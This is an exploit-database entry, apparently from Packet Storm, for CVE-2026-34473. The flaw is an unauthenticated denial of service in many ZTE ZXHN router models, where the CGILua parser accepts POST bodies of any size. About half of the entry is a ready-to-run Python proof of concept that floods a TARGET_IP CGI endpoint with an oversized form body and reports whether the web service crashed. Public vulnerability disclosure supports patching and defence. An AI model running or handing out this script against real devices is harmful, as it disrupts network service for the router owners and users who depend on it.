## https://sploitus.com/exploit?id=PACKETSTORM:221651
# Title: ZTE Routers (17+ Models) - Unauthenticated Denial of Service via
Oversized POST Body
# Date: 2026-05-20
# Author: Mina Nageh Salalma (Monx Research)
# CVE: CVE-2026-34473
# Vendor: ZTE Corporation
# Affected: 17+ ZTE ZXHN router models (~140,000 publicly exposed devices)
# Category: Remote / DoS
# Description:
# CGILua post.lua parser does not enforce a maximum body size on
# application/x-www-form-urlencoded POST requests. Sending an oversized
# POST body to any CGI endpoint crashes or freezes the web service.
# No authentication required.
#
# MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34473
# Write-up:
https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
# PoC:
import requests
url = "http://TARGET_IP/cgi-bin/luci"
payload = "a=" + "A" * (256 * 1024)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
try:
r = requests.post(url, data=payload, headers=headers, timeout=15)
print(f"HTTP {r.status_code} - device still up")
except requests.exceptions.Timeout:
print("Timeout - web service unresponsive (DoS successful)")
except requests.exceptions.ConnectionError:
print("Connection dropped - web service crashed (DoS successful)")